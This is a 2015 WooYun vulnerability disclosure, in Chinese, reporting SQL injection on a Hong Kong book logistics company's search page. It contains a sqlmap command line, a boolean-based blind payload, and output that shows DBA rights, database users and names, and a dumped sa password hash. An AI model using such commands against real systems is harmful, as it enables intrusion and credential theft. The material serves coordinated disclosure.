当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151443

漏洞标题:聯合書刊物流有限公司某處存在SQL插入攻擊(DBA權限/sa密碼泄露)(香港地區)

相关厂商:聯合書刊物流有限公司

漏洞作者: 路人甲

提交时间:2015-11-04 18:18

修复时间:2015-12-22 13:24

公开时间:2015-12-22 13:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-04: 细节已通知厂商并且等待厂商处理中
2015-11-07: 厂商已经确认,细节仅向厂商公开
2015-11-17: 细节向核心白帽子及相关领域专家公开
2015-11-27: 细节向普通白帽子公开
2015-12-07: 细节向实习白帽子公开
2015-12-22: 细节向公众公开

简要描述:

關於聯合書刊物流有限公司
我們的經營理念是把出版社、書店和讀者銜接在一起,成為信息、物流、商流的中樞。
香港聯合書刊物流有限公司為聯合出版(集團)有限公司屬下發行機構。聯合出版(集團)有限公司一直以弘揚中華文化,介紹當代中國為己任,業務包括圖書出版、書刊發行與零售、書刊、商業與安全印刷,現時集團業務遍佈香港、中國內地、台灣地區、東南亞、日本、北美及歐洲等地。為配合業務發展,提升競爭力,集團於二零零四年六月重整發行業務,成立香港聯合書刊物流有限公司。
香港最具規模的圖書物流公司之一
與香港及世界各地400多家出版社和近1,000家書店有業務聯繫。每天經我們上市的圖書達20萬冊,是香港最具規模的圖書物流公司之一。

详细说明:

地址:http://**.**.**.**/booksearchList.aspx?category=198&categorycode=A08

python sqlmap.py -u "http://**.**.**.**/booksearchList.aspx?category=198&categorycode=A08" -p category --technique=B --random-agent --batch -D-current-user --is-dba --users --passwords --dbs

漏洞证明:

---
Parameter: category (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: category=198 AND 6702=6702&categorycode=A08
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user: 'SUP_NAME'
current user is DBA: True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: category (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: category=198 AND 6702=6702&categorycode=A08
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
database management system users [4]:
[*] dRUser
[*] sa
[*] slhkuser
[*] SUP_NAME
database management system users password hashes:
[*] dRUser [1]:
password hash: NULL
[*] sa [1]:
password hash: 0x01004086ceb6869e35d068dc9b1743a627363998b89e98cd5a43
header: 0x0100
salt: 4086ceb6
mixedcase: 869e35d068dc9b1743a627363998b89e98cd5a43
[*] slhkuser [1]:
password hash: NULL
[*] SUP_NAME [1]:
password hash: NULL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: category (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: category=198 AND 6702=6702&categorycode=A08
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [7]:
[*] dRSLHK
[*] master
[*] model
[*] msdb
[*] SLHK
[*] sup
[*] tempdb

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-11-07 13:23

厂商回复:

已將事件通知有關機構

最新状态:

暂无